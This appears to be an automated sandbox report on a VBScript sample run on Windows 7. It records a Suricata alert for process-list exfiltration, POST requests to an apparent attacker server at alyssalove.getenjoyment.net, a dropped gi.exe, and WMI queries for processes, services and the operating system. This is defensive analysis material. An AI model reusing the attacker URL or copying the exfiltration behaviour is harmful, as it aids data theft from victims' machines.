Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x3201 | June 8, 2021, 4:36 p.m. | June 8, 2021, 4:38 p.m. |
-
wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\ADMINI~1\AppData\Local\Temp\dootakim.vbs
2916
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49608 -> 185.176.43.98:80 | 2027117 | ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
suspicious_features | POST method with no referer header | suspicious_request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
request | GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j%2BApJVk%3D |
request | GET http://evcs-ocsp.ws.symantec.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQckPwgwK2Thdm9JYVwXQ4ERz3XDQQUo47PGUI9MeGrIYmEbcvZeaKysloCEFDtZ0JVYUv07T7UI8yTyn0%3D |
request | GET http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl |
request | GET http://s2.symcb.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD%2BOyl%2B0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCED141%2Fl2SWCyYX308B7Khio%3D |
request | GET http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEBLwJ34PIzs5%2BUGbBujN41I%3D |
request | GET http://sv.symcb.com/sv.crl |
request | GET http://crl.verisign.com/pca3.crl |
request | GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECcNdVyfWsO322H1CZgocHg%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAx5qUSwjBGVIJJhX%2BJrHYM%3D |
request | GET http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCEDA2ePYtKPWPCdFq3RW5wHE%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEA3etT%2BVczf76vmMSmFbFJ0%3D |
request | GET http://sv.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQe6LNDJdqx%2BJOp7hVgTeaGFJ%2FCQgQUljtT8Hkzl699g%2B8uK8zKt4YecmYCEADzAwdvBip42MYbURaknTY%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D |
request | GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D |
request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
request | POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=%ProgramFiles(x86)%&rdxvdw=C:\Program%20Files |
file | C:\Users\Administrator\AppData\Roaming\gi.exe |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\OnlyStopWatch_x64.zip.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\test_eml.mht.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\네트워크 및 인터넷.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.pyw.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.py.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\한글2007.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (2).lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\모든 제어판 항목.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\agent.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\로컬 디스크 (C).lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\프로그램.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\모양 및 개인 설정.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\사용자 계정 및 가족 보호.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\test.eml.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\policies.json.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\age.pyw.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Start Tor Browser.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\Python27.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\office_2007.lnk |
file | C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer (2).lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\알림 영역 아이콘.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\다운로드.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\sn.txt.lnk |
file | C:\Users\Administrator\AppData\Roaming\microsoft\Windows\Recent\시스템 및 보안.lnk |
wmi | Select Name, Version from Win32_Product Where Name Like 'Microsoft .NET Framework%' |
wmi | Select * from Win32_Process |
wmi | Select * from Win32_OperatingSystem |
wmi | Select * from Win32_Service WHERE state = "Running" |
file | C:\Users\Administrator\AppData\Roaming\gi.exe |
wmi | Select * from Win32_Service WHERE state = "Running" |